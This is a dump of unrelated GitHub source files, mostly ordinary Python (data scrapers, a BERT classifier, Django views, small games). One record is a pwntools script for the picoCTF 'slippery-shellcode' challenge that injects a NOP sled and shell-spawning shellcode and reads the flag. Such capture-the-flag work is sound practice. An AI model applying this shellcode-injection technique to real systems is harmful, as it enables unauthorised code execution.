api_hash, phone, database_encryption_key, setting, proxy_server, proxy_port, proxy_type\n\ndef login():\n tg = Telegram(\n api_id=api_id,\n api_hash=api_hash,\n phone=phone,\n database_encryption_key=database_encryption_key,\n proxy_server=proxy_server,\n proxy_port=proxy_port,\n proxy_type=proxy_type,\n )\n tg.login()\n\n return tg\n\ntg = login()\n","repo_name":"Yoo-4x/telegram_bot","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"21243764814","text":"from dataclasses import asdict\nfrom datetime import datetime\nfrom json import dump, JSONEncoder\nfrom pathlib import Path\nfrom typing import Any, Callable, TYPE_CHECKING\n\nfrom pydantic import parse_file_as\nfrom xdg import xdg_config_home\n\nfrom just_start_broker.persistence import ScheduleNotExpired, ScheduleNotFoundError\nfrom just_start_broker.schemas import Schedule\n\nif TYPE_CHECKING:\n from just_start_broker.app import ScheduleAccessor\n\n\ndef get_schedule_accessor(\n *, config_path: Path = xdg_config_home()\n) -> \"ScheduleAccessor\":\n return FileScheduleAccessor(config_path / \"just-start-broker\" / \"schedule.json\")\n\n\nclass ScheduleEncoder(JSONEncoder):\n def default(self, o: Any) -> Any:\n if isinstance(o, datetime):\n return str(o)\n return super().default(o)\n\n\nclass FileScheduleAccessor:\n def __init__(self, path: Path, get_now: Callable[[], datetime] = datetime.utcnow):\n self.path = path\n self.get_now = get_now\n\n def create(self, schedule: Schedule) -> None:\n raise_if_schedule_is_unexpired(self.read, self.get_now())\n self.path.parent.mkdir(exist_ok=True, parents=True)\n with open(self.path, \"w\") as f:\n dump(asdict(schedule), f, cls=ScheduleEncoder)\n\n def read(self) -> Schedule:\n try:\n return parse_file_as(Schedule, self.path)\n except FileNotFoundError as e:\n raise ScheduleNotFoundError from e\n\n\ndef raise_if_schedule_is_unexpired(\n read_schedule: Callable[[], Schedule], now: datetime\n) -> None:\n try:\n schedule = read_schedule()\n except ScheduleNotFoundError:\n pass\n else:\n if schedule.expiration > now:\n raise ScheduleNotExpired(schedule.expiration)\n","repo_name":"AliGhahraei/just-start-broker","sub_path":"just_start_broker/file_persistence.py","file_name":"file_persistence.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"30771909","text":"#!/bin/env python3\n# Helpers\n\nimport os, re, subprocess, atexit, code, readline\n\nfrom config import history_file\n\nclass GConsole( code.InteractiveConsole ):\n \"\"\"Interactive Console with history and emacs short-cuts\n\n This class modifies the InteractiveConsole class from the \"code\" module to\n support a history, the history file is typically located at the following path:\n ~/.config/G/history\n \"\"\"\n\n def __init__( self, locals = None, filename = \"\",\n histfile = history_file() ):\n code.InteractiveConsole.__init__(self, locals, filename)\n self.init_history( histfile )\n def init_history( self, histfile ):\n readline.parse_and_bind( \"tab: complete\" )\n if hasattr( readline, \"read_history_file\" ):\n try:\n readline.read_history_file( histfile )\n except FileNotFoundError:\n pass\n atexit.register( self.save_history, histfile )\n def save_history( self, histfile ):\n readline.write_history_file( histfile )\n\ndef clean_history( history_file = history_file() ):\n previous_line = None\n clean_lines = []\n for line in sorted( open( history_file, \"r\" ) ):\n if not line == previous_line:\n clean_lines.append( line )\n previous_line = line\n # Clear the old history file\n with open( history_file, \"w\" ) as file:\n file.close()\n # Append only lines, that are different to their previous line\n for line in clean_lines:\n with open( history_file, \"a\" ) as file:\n file.write( line )\n file.close()\n\ndef emend_path( path_to_emend ):\n \"\"\"This function convert a string to an OS independent path\"\"\"\n\n path = re.split( r\"[\\\\\\/]\", os.path.expanduser( path_to_emend ) )\n if re.match( r\"([\\/\\\\]|[^~])\", path_to_emend[0:1] ):\n return path.insert( 0, os.sep )\n else:\n return os.getcwd() + os.sep + os.path.join( *path )\n\ndef is_path( possible_path ):\n \"\"\"Returns True when the possible_branch is a valid path (POSIX/Windows)\n\n Arguments:\n possible_path: A string which should be checked if it is a valid path\n \"\"\"\n\n if re.match( r\"^(([A-Z]\\:\\\\\\\\)|([\\/\\\\]*[\\w]+))([\\\\\\/]*[\\w\\-\\.]*)*$\",\n os.path.expanduser( possible_path ) ):\n return True\n else:\n return False\n\ndef is_variable( possible_variable ):\n \"\"\"Returns True when the possible_variable is a branch\n\n In \"G\" syntax a variable is escaped by a \"@\" (i.e. @name_of_branch)\n This function checks the argument \"possible_variable\" for exactly this syntax.\n\n Arguments:\n possible_variable: A string which should be checked for the branch-syntax of \"G\"\n \"\"\"\n\n if re.match( r\"^\\@[\\w\\-\\.\\/]*$\", possible_variable ):\n return True\n else:\n return False\n\ndef is_repository( possible_repository = os.getcwd() ):\n for file in os.listdir( possible_repository ):\n if file == \".git\":\n return True\n return False\n\ndef is_empty( element ):\n return len( element ) == 0\n\ndef git( cmd, operand = None ):\n \"\"\"Start a git command as a subprocess\n\n Arguments:\n cmd: The git command, that should to be executed. This argument must be one\n of the following: \"push\", \"pull\", \"merge\", \"add\", \"reset\"\n operand: Contains the files or branches, that need to be processed.\n \"\"\"\n\n try:\n if not operand:\n subprocess.check_call( [ \"git\", cmd ] )\n elif type( operand ) == str:\n subprocess.check_call( [ \"git\", cmd ] + operand.split() )\n else:\n subprocess.check_call( [ \"git\", cmd ] + operand )\n except OSError:\n error( \"Git need to be installed to proberly use G\" )\n\ndef get_current_branch():\n current_branch = subprocess.check_output( \"git rev-parse --abbrev-ref HEAD\".split() )\n # Convert the byte-string to utf-8\n current_branch = current_branch.decode( \"utf-8\" )\n # Return the current branch without the newline character (\"\\n\")\n return current_branch[:-1]\n","repo_name":"kokakolako/G","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20673210368","text":"# https://www.kaggle.com/code/nayansakhiya/text-classification-using-bert/notebook\n# https://zhuanlan.zhihu.com/p/35866604 -> 嘗試解決OOM\n# import tokenization\nfrom bert.tokenization import bert_tokenization\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow.keras.losses import BinaryFocalCrossentropy\nfrom tensorflow.keras.layers import LeakyReLU\nfrom keras.utils import to_categorical\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nfrom keras.models import load_model\nimport tensorflow_text as text\nimport time\nimport yaml\n\n\nclass DataManager():\n def __init__(self, data_name, df):\n self.data_name = data_name\n self.df = df\n\n def get_df(self):\n self.df['content'] = self.df['content'].str.lower()\n return df\n\n# Build The Model\ndef build_model(bert_layer, preprocessor, labels_number, max_len=128):\n text_input = tf.keras.layers.Input(shape=(), dtype=tf.string, name='text')\n preprocessed_text = preprocessor(text_input)\n outputs = bert_layer(preprocessed_text)\n\n # outputs['pooled_output'], outputs['sequence_output']\n \n # clf_output = outputs['sequence_output'][:, 0, :]\n clf_output = outputs['pooled_output']\n \n lay = tf.keras.layers.Dense(64, activation='relu')(clf_output)\n lay = tf.keras.layers.Dropout(0.2)(lay)\n out = tf.keras.layers.Dense(labels_number, activation='sigmoid')(lay)\n # out = tf.keras.layers.Dense(labels_number, activation='softmax')(lay)\n \n model = tf.keras.models.Model(inputs=[text_input], outputs=out)\n # model.compile(tf.keras.optimizers.Adam(lr=2e-5), loss='categorical_crossentropy', metrics=['accuracy'])\n model.compile(tf.keras.optimizers.Adam(lr=2e-5), loss='binary_crossentropy', metrics=['accuracy'])\n \n return model\n\n\nif __name__ == \"__main__\":\n\n data_name = '20230724-V1-云南省昆明市西山区昆州路'\n\n df = pd.read_csv('./data/' + data_name + '.csv', encoding='utf-8')\n dataManager = DataManager(data_name, df)\n\n\n df = dataManager.get_df()\n\n train_data, test_data = train_test_split(df, test_size=0.2)\n\n # Label encoding of labels\n label = preprocessing.LabelEncoder()\n y = label.fit_transform(train_data['label'])\n y = to_categorical(y)\n\n\n print(type(y[0][0]))\n sys.exit(0)\n\n # 將input轉換成小寫\n train_data['content'] = train_data['content'].str.lower()\n\n # Chinese version\n bert_url = './model/distilbert_multi_cased_L-6_H-768_A-12_1'\n bert_layer = hub.KerasLayer(bert_url, trainable=True)\n\n preprocess_url = './model/distilbert_multi_cased_preprocess_2'\n preprocessor = hub.KerasLayer(preprocess_url)\n\n train_labels = y\n labels = label.classes_\n\n print(train_labels[0])\n sys.exit(0)\n\n max_len = 128\n\n model = build_model(bert_layer, preprocessor, len(labels), max_len=max_len)\n model.summary()\n\n epochs = 20\n model_name = '20230725-V1-hospital_bert_model_epoch' + str(epochs)\n\n # Run the model\n checkpoint = tf.keras.callbacks.ModelCheckpoint('./save_model/' + model_name + '.h5', monitor='val_accuracy', save_best_only=True, verbose=1)\n earlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, verbose=1)\n # earlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_accuracy', patience=5, verbose=1)\n\n train_sh = model.fit(\n train_data.content.values, train_labels,\n validation_split=0.2,\n epochs=epochs,\n callbacks=[checkpoint, earlystopping],\n batch_size=16,\n verbose=1\n )\n\n\n model.save('./save_model/' + model_name + '.h5')\n\n","repo_name":"Sombcholic/tf2_public","sub_path":"DistilBERT/main_hospital.py","file_name":"main_hospital.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"11915915369","text":"from lxml import etree\nfrom utils import get_page\nimport time\n\n\n# 元类\nclass ProxyMetaclass(type):\n def __new__(mcs, name, bases, attrs):\n count = 0\n attrs['__CrawlFunc__'] = []\n for k, v in attrs.items():\n # 如果以包含crawl_,就\n # 认为是爬虫函数\n if 'crawl_' in k:\n attrs['__CrawlFunc__'].append(k)\n count += 1\n attrs['__CrawlFuncCount__'] = count\n return type.__new__(mcs, name, bases, attrs)\n\n\nclass Crawler(metaclass=ProxyMetaclass):\n def get_proxies(self, callback):\n proxies = []\n for proxy in eval(\"self.{0}()\".format(callback)):\n print('成功获取到代理', proxy)\n proxies.append(proxy)\n return proxies\n\n def crawl_daili66(self, page_count=4):\n start_url = 'http://www.66ip.cn/{0}.html'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n trs = selector.xpath('.//div[@id=\"main\"]/div[1]/div[1]/table/tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[1]/text()')[0]\n port = trs[i].xpath('.//td[2]/text()')[0]\n yield ':'.join([ip, port])\n\n def crawl_ip3366(self, page_count=4):\n start_url = 'http://www.ip3366.net/free/?stype=1&page={0}'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n table = selector.xpath('.//div[@id=\"list\"]/table')[0]\n trs = table.xpath('.//tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[1]/text()')[0]\n port = trs[i].xpath('.//td[2]/text()')[0]\n yield ':'.join([ip, port])\n\n def crawl_kuaidaili(self, page_count=4):\n start_url = 'http://www.kuaidaili.com/free/inha/{0}/'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n table = selector.xpath('.//div[@id=\"list\"]/table')[0]\n trs = table.xpath('.//tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[1]/text()')[0]\n port = trs[i].xpath('.//td[2]/text()')[0]\n yield ':'.join([ip, port])\n time.sleep(1)\n\n def crawl_xicidaili(self, page_count=4):\n start_url = 'http://www.xicidaili.com/nn/{0}'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n trs = selector.xpath('.//table[@id=\"ip_list\"]/tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[2]/text()')[0]\n port = trs[i].xpath('.//td[3]/text()')[0]\n yield ':'.join([ip, port])\n\n\nif __name__ == '__main__':\n crawler = Crawler()\n","repo_name":"lssxfy123/PythonStudy","sub_path":"proxy_test/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"75062155043","text":"\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nimport requests\nimport json\nimport ast\nimport urllib\nfrom collections import Counter\nfrom front.common import authetication_required\nimport configparser\nparser = configparser.RawConfigParser()\nparser.read('/opt/optima/global_configuration/optima_configuration_file.cnf')\nAPI_URI = 'http://{0}:{1}'.format(parser.get('API_SECTION', 'API_HOST'),\n parser.get('API_SECTION', 'API_PORT'))\n\nELEMENT_TYPE_MAPPING = {\"echart\":\"echart.html\",\n \"donut\":\"donut.html\",\n \"top\":\"top.html\",\n \"bar\":\"bar.html\",\n \"doughnut\": \"doughnut.html\",\n }\n\ndef formatValues(rows, dashboardElementType):\n if dashboardElementType == 'echart':\n rows.reverse()\n names = [row[\"name\"] for row in rows]\n series = []\n if rows != []:\n keys = list(rows[0].keys())\n keys.remove('name')\n else : keys = []\n for k in keys:\n serie = {\"name\":k, 'data':[]}\n for row in rows:\n serie['data'].append(row[k])\n series.append(serie)\n return {\"names\":names, \"series\":series}\n elif dashboardElementType == 'top':\n i = 1\n for value in rows:\n row = {\"row\": i}\n value.update(row)\n i=i+1\n return rows\n else:\n return rows\n\n\n@authetication_required()\ndef Dashboard(request):\n if(request.POST.get('logout')):\n del request.session['jwt_token'] \n return render(request, 'login.html')\n headers = {'Authorization' : 'JWT {0}'.format(request.session.get('jwt_token'))}\n statisticsResponse = requests.get(API_URI + '/dashboardElement/statistics', headers=headers)\n statistics = statisticsResponse.json()\n for k,v in statistics['data'][0].items():\n if isinstance(v, int): statistics['data'][0][k] = str(v)\n if isinstance(v, float): statistics['data'][0][k] = '{:.2f}'.format(v)\n dashboards = requests.get(API_URI + '/dashboard/3', headers=headers)\n elementsHtml = []\n for element in dashboards.json()[\"dashboardElements\"]:\n elmnt = requests.get(API_URI + '/dashboardElement/{0}'.format(element), headers=headers)\n elementJson = elmnt.json()\n template = ELEMENT_TYPE_MAPPING.get(elementJson[\"type\"])\n if not template: raise Exception('Template ' + elementJson[\"type\"] + ' not found.') \n values = elementJson[\"data\"]\n\n formattedValues = formatValues(values, elementJson[\"type\"])\n html = render_to_string(template, {'values': formattedValues,\n 'name': element,\n 'description':elementJson['description'],\n })\n elementsHtml.append({\"html\": html, \"id\": element})\n return render(request, 'dashboard.html', {'dashboardElements': elementsHtml,\n 'statistics': statistics,\n })\n\ndef DashboardElement(request): \n id_ = request.GET.get('id')\n if not id_: return 'OOPS', 400\n headers = {'Authorization' : 'JWT {0}'.format(request.session.get('jwt_token'))}\n elmnt = requests.get(API_URI + '/dashboardElement/{0}'.format(id_), headers=headers)\n elementJson = elmnt.json()\n template = ELEMENT_TYPE_MAPPING.get(elementJson[\"type\"])\n if not template: raise Exception('Template ' + elementJson[\"type\"] + ' not found.') \n values = elementJson[\"data\"]\n formattedValues = formatValues(values, elementJson[\"type\"])\n return render(request, template, {'values': formattedValues,\n 'name': id_,\n 'description':elementJson['description'],\n })\n# Create your views here.\n","repo_name":"kdfwow64/python-cors-again","sub_path":"frontend/front/dashboards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73714216806","text":"import os\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\n\nimport sys\n\n\n\ndef save_all_lyrics(url, directory):\n \"\"\"\n Download each song lyrics from every lyric html page from the artist page.\n\n Parameters\n ----------\n url = url link of the artist page\n directory = directory where you want to save all the file\n both parameters need to be strings\n\n Returns\n -------\n download song files into chosen directory.\n\n \"\"\"\n #DOWNLOAD ARTIST URL AS TEXT FILE\n request = requests.get(url) # Send the request\n with open(str(url.split('/')[-2]) + '.txt', 'w') as file: # Save the html in a txt file and search in an editor\n file.write(request.text)\n\n #CREATE BEAUTIFULSOUP FOR PARSING AND SELECTING LYRIC LINKS\n text = request.text # Get donwloaded text file from original url\n artist_soup = BeautifulSoup(text, 'html.parser') #Use beautifulsoup for parsing\n\n\n #LOOP FOR ADDING ALL LYRIC LINKS INTO A LIST\n links = [] # Create list with links\n for td in artist_soup.find_all('td'):\n if \"tal\" in td.get('class',[]): # selection according to parsing\n links.append('https://www.lyrics.com' + td.find('a')['href']) # append each link into the list with complete url\n\n #LOOP TO CREATE LYRIC TEXT FILES FOR EACH LYRIC LINK\n for i in range(len(links)):\n temp_url = links[i] #create temporary links for each link on the links list\n title = temp_url.split('/')[-1] #create title based on the temp lyric url\n\n temp_req = requests.get(temp_url) #request each temp lyric link\n\n with open(directory + title + '.txt', 'w') as file:\n soup_artist = BeautifulSoup(temp_req.text) #create a bsoup out of each lyric file\n lyrics = soup_artist.pre.get_text() #get only the text from lyrics\n file.writelines(lyrics)\n","repo_name":"brauliotegui/SPICED","sub_path":"Week_04/download_songs.py","file_name":"download_songs.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"25380767209","text":"import os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nimport openai\nimport streamlit as st\nfrom PyPDF2 import PdfReader\nfrom io import StringIO\n\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.vectorstores import FAISS\n\nfrom langchain.chains.question_answering import load_qa_chain\n\nfrom langchain.llms import OpenAI\n\nllm = OpenAI(temperature=0.7,model_name='gpt-3.5-turbo')\n\nOPENAI_API_KEY = os.getenv(\"OPENAI_API_KEY\")\n\n\ndef main():\n st.title(\"PDF to Text\")\n st.header(\"Upload a PDF file and ask any question about it.\")\n\n pdf = st.file_uploader(\"Upload a PDF file\", type=[\"pdf\"], accept_multiple_files=False)\n \n if pdf is not None:\n pdf_reader = PdfReader(pdf)\n text = \"\"\n for page in pdf_reader.pages:\n text += page.extract_text()\n text_splitter = CharacterTextSplitter(\n separator='\\n',\n chunk_size=1000,\n chunk_overlap=200,\n length_function=len\n )\n chunks = text_splitter.split_text(text)\n st.write(\"PDF file uploaded successfully\")\n\n # we will create embeddings for each chunk\n\n embadding = OpenAIEmbeddings()\n knowledge_base = FAISS.from_texts(chunks, embadding)\n st.write(\"Embeddings created successfully\")\n query = st.text_input(\"Ask a question about the PDF file\")\n if query:\n st.write(\"Searching for the answer...\")\n docs = knowledge_base.similarity_search(query)\n # st.write(result)\n chain = load_qa_chain(llm,chain_type='stuff')\n response = chain.run(input_documents=docs, question=query)\n st.write(response)\n\n\n else:\n st.write(\"Please upload a PDF file\")\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"kamalchibrani-ai/langchain_tinkering","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73947744804","text":"from gather.consts import Formats, SourceTypes\n'''\nСписок опрашиваемых модулей\nid->str: для идентификации\ntype->str: тип устройства, реализовано: SourceTypes.MODBUS_TCP\nip->str: ip источника\nport->int: порт источника\nunit->int: номер устройства (в ТСР обычно 1, если ТСР конвертер в 485 - номер в 485-й сети)\naddr_pool: раздел таблицы адресов из consts.Formats CO | DI | HR | IR\naddress->int: начальный адрес чтения данных\ncount->int: кол-во последовательных адресов для чтения\nperiod->float: период опроса в сек\n'''\nmodule_list = [\n {'type': SourceTypes.MODBUS_TCP, 'ip': '172.19.10.7', 'port': 502, 'unit': 0x1,\n 'addr_pool': Formats.IR, 'address': 0, 'count': 1, 'period': 0.5},\n {'type': SourceTypes.MODBUS_TCP, 'ip': '172.19.10.7', 'port': 502, 'unit': 0x1,\n 'addr_pool': Formats.DI, 'address': 0, 'count': 8, 'period': 0.5},\n]\n\n\nmodbus_server_1 = {'host': '127.0.0.1', 'port': 510}\nmodbus_server_2 = {'host': '127.0.0.1', 'port': 511}\n\nPOLL_PERIOD = 0.5\n","repo_name":"IgorVDubov/mbsplitter","sub_path":"modbusconfig.py","file_name":"modbusconfig.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13425683689","text":"#!/usr/local/bin/python3\nwith open(\"input.txt\", \"r\") as f:\n data = f.read()\n\nmesLen = len(data)\n\ndef elfFunction(m):\n n=m-1\n for i in range(n, (mesLen-1)):\n test = data[(i-n):(i+1)]\n lets = []\n for j in range(m):\n lets.append(test[j])\n letSet = set(lets)\n if (len(letSet)==m):\n print(i+1, letSet)\n break\n\nelfFunction(4) # part1\nelfFunction(14) # part2","repo_name":"nickcowans/adventofcode","sub_path":"2022/Day_06/day-06.py","file_name":"day-06.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5815143847","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n #The idea is simply. The product basically is calculated using the numbers before the current number and the numbers after the current number. Thus, we can scan the array twice. First, we calcuate the running product of the part before the current number. Second, we calculate the running product of the part after the current number through scanning from the end of the array.\n p = 1\n n = len(nums)\n res = [] ###[0] * n\n for i in range(n):\n res.append(p)\n p *= nums[i]\n p = 1\n for i in reversed(range(n)):\n res[i] *= p\n p *= nums[i]\n return res\n \n \n \n","repo_name":"shaniavina/Leetcode_Python","sub_path":"product_of_array_except_self.py","file_name":"product_of_array_except_self.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10028625166","text":"from pwn import *\nimport sys\n\nargv = sys.argv\n\nDEBUG = True\nBINARY = './vuln'\n\ncontext.binary = BINARY\ncontext.terminal = ['tmux', 'splitw', '-v']\n\ndef attach_gdb():\n gdb.attach(sh)\n\n\nif DEBUG:\n context.log_level = 'debug'\n\nif len(argv) < 2:\n stdout = process.PTY\n stdin = process.PTY\n\n sh = process(BINARY, stdout=stdout, stdin=stdin)\n\n # if DEBUG:\n # attach_gdb()\n\n REMOTE = False\nelse:\n s = ssh(host='2019shell1.picoctf.com', user='sashackers', password=\"XXX\")\n sh = s.process('/problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0/vuln')\n REMOTE = True\n\n\nsh.sendlineafter(':\\n', '\\x90'*256+asm(shellcraft.i386.linux.sh()))\nsh.sendlineafter('$ ', 'cat /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0/flag.txt')\nsh.interactive()\n","repo_name":"tcode2k16/blog","sub_path":"static/picoctf-2019-writeup/binary-exploitation/slippery-shellcode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39908766056","text":"\r\n# ----------------------Transposition Cipher----------------------\r\n\r\ndef encryptTranspositionCipher(text, key):\r\n ourArr = list(text)\r\n ourArr = [ourArr[index:index + key] for index in range(0, len(ourArr), key)]\r\n string = \"\"\r\n scrambledArr = []\r\n elementExistence = 0\r\n arrElemC = 0\r\n\r\n while arrElemC < len(ourArr[0]):\r\n for i in range(0, len(ourArr)):\r\n if elementExistence < len(ourArr[i]):\r\n string += ourArr[i][elementExistence]\r\n\r\n scrambledArr.append(string)\r\n string = \"\"\r\n arrElemC += 1\r\n elementExistence += 1\r\n\r\n return \"\".join(scrambledArr)\r\n\r\n\r\ndef decryptTranspositionCipher(text, key):\r\n ourArr = list(text)\r\n q, r = divmod(len(ourArr), key)\r\n slicedArr = list((ourArr[index * q + min(index, r):(index + 1) * q + min(index + 1, r)] for index in range(key)))\r\n\r\n string = \"\"\r\n elementExistence = 0\r\n arrElemC = 0\r\n decryptedArr = []\r\n while arrElemC < len(slicedArr[0]):\r\n for i in range(0, len(slicedArr)):\r\n if elementExistence < len(slicedArr[i]):\r\n string += slicedArr[i][elementExistence]\r\n\r\n decryptedArr.append(string)\r\n string = \"\"\r\n arrElemC += 1\r\n elementExistence += 1\r\n\r\n return \"\".join(decryptedArr)\r\n","repo_name":"nickgabriadze/ciphers","sub_path":"TranspositionCipher.py","file_name":"TranspositionCipher.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74826523364","text":"# Rock Paper Scissors Game\nimport random # Imports the random module, ignore for now\n\ndef LineBreak():\n print(\"\\n---------------------\\n\") # Creates a function that puts a line break in to make the code look a bit neater\n\n# Attempt at making an AI player\ndef UserInput(bAI, sPlayer1Name, sPlayer2Name):\n if bAI == True: # If the player wants to play against an AI, do this\n sOptions = [\"rock\", \"paper\", \"scissors\"] # Puts the options into a list\n iAIInput = random.randint(0,2) # Generate a random number between 0 and 2\n sPlayer2Input = sOptions[iAIInput] # Get the option from that position in the list\n sPlayer1Input = input(sPlayer1Name + \"\"\", please enter either Rock, Paper or Scissors\n--> \"\"\")\n sPlayer1Input = sPlayer1Input.lower() # Changes sPlayer1Input to be all lower case\n print(sPlayer2Name + \" picked \" + sPlayer2Input) # Print what the AI picked\n return sPlayer1Input, sPlayer2Input\n\n elif bAI != True:\n sPlayer1Input = input(sPlayer1Name + \"\"\", please enter either Rock, Paper or Scissors\n--> \"\"\")\n sPlayer1Input = sPlayer1Input.lower() # Changes sPlayer1Input to be all lower case\n sPlayer2Input = input(sPlayer2Name + \"\"\", please enter either Rock, Paper or Scissors\n--> \"\"\")\n sPlayer2Input = sPlayer2Input.lower() # Changes sPlayer2Input to be all lower case\n return sPlayer1Input, sPlayer2Input\n\ndef RockPaperScissorsWinConditions(sPlayer1Input, sPlayer2Input, sPlayer1Name, sPlayer2Name, iPlayer1Score, iPlayer2Score):\n\n # The win conditions for the game, calculating who won and printing the winner\n if sPlayer1Input == \"rock\" and sPlayer2Input == \"scissors\": \n print(sPlayer1Name + \" Wins!\\n\")\n iPlayer1Score += 1\n elif sPlayer1Input == \"paper\" and sPlayer2Input == \"rock\":\n print(sPlayer1Name + \" Wins!\\n\")\n iPlayer1Score += 1\n elif sPlayer1Input == \"scissors\" and sPlayer2Input == \"paper\":\n print(sPlayer1Name + \" Wins!\\n\")\n iPlayer1Score += 1\n elif sPlayer2Input == \"rock\" and sPlayer1Input == \"scissors\":\n print(sPlayer2Name + \" Wins!\\n\")\n iPlayer2Score += 1\n elif sPlayer2Input == \"paper\" and sPlayer1Input == \"rock\":\n print(sPlayer2Name + \" Wins!\\n\")\n iPlayer2Score += 1\n elif sPlayer2Input == \"scissors\" and sPlayer1Input == \"paper\":\n print(sPlayer2Name + \" Wins!\\n\")\n iPlayer2Score += 1\n elif sPlayer1Input == sPlayer2Input: # If the answers were the same, it's a draw\n print(\"It's a draw!\\n\")\n else:\n print(\"One of those entries was invalid, please try again\") # If the input was different to what was expected, print this\n return iPlayer1Score, iPlayer2Score\n\ndef RockPaperScissors(iNumberOfRounds, bAI): # Creates a function to run the Rock, Paper, Scissors game\n iPlayer1Score = 0\n iPlayer2Score = 0\n sPlayer1Name = input(\"Please input the name of player 1: \") # Gets the user to enter the names of the players\n sPlayer2Name = input(\"Please input the name of player 2 (or the AI): \")\n\n LineBreak()\n\n if iNumberOfRounds == \"Infinite\": # If the player wants to play infinitely, do this\n \n while True: # Loop infinitely\n print(\"Enter 'exit' if you want to stop playing\\n\")\n (sPlayer1Input, sPlayer2Input) = UserInput(bAI, sPlayer1Name, sPlayer2Name) # Calls to the function for user inputs\n\n if sPlayer1Input == \"exit\" or sPlayer2Input == \"exit\": # If the user enters this, exit the infinite loop\n break\n \n else:\n (iPlayer1Score, iPlayer2Score) = RockPaperScissorsWinConditions(sPlayer1Input, sPlayer2Input, sPlayer1Name, sPlayer2Name, iPlayer1Score, iPlayer2Score)\n\n LineBreak()\n \n print(\"The scores are\\n\"+ sPlayer1Name + \": \" + str(iPlayer1Score) + \"\\n\" + sPlayer2Name + \": \" + str(iPlayer2Score))\n\n LineBreak()\n\n else: # If the number of rounds is not infinite, do this\n \n for i in range(iNumberOfRounds): # For iNumberOfRounds, do this\n \n (sPlayer1Input, sPlayer2Input) = UserInput(bAI, sPlayer1Name, sPlayer2Name) # Calls the function for user inputs\n \n (iPlayer1Score, iPlayer2Score) = RockPaperScissorsWinConditions(sPlayer1Input, sPlayer2Input, sPlayer1Name, sPlayer2Name, iPlayer1Score, iPlayer2Score) # Calls the function for the win conditions\n \n print(\"The scores are\\n\"+ sPlayer1Name + \": \" + str(iPlayer1Score) + \"\\n\" + sPlayer2Name + \": \" + str(iPlayer2Score)) # Prints the player scores\n\n return iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name # Returns the player scores and their names as a tuple\n\ndef Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name): # Function for calculating the overall winner\n if iPlayer1Score > iPlayer2Score: # If player 1's score is higher, they win\n print(sPlayer1Name + \" is the overall winner!\")\n elif iPlayer1Score < iPlayer2Score: # If player 2's score is higher, they win\n print(sPlayer2Name + \" is the overall winner!\")\n elif iPlayer1Score == iPlayer2Score: # If both scores are equal, they tie\n print(\"It's a draw!\")\n \n \nprint(\"Welcome to my Rock, Paper, Scissors Game!\")\n\nsAIPlayer = input(\"\"\"Would you like to play against an AI, or with another player? Y/N\n--> \"\"\")\nif sAIPlayer.lower() == \"y\": # If the lower case of the input is equal to this, set bAI to true\n bAI = True\nelif 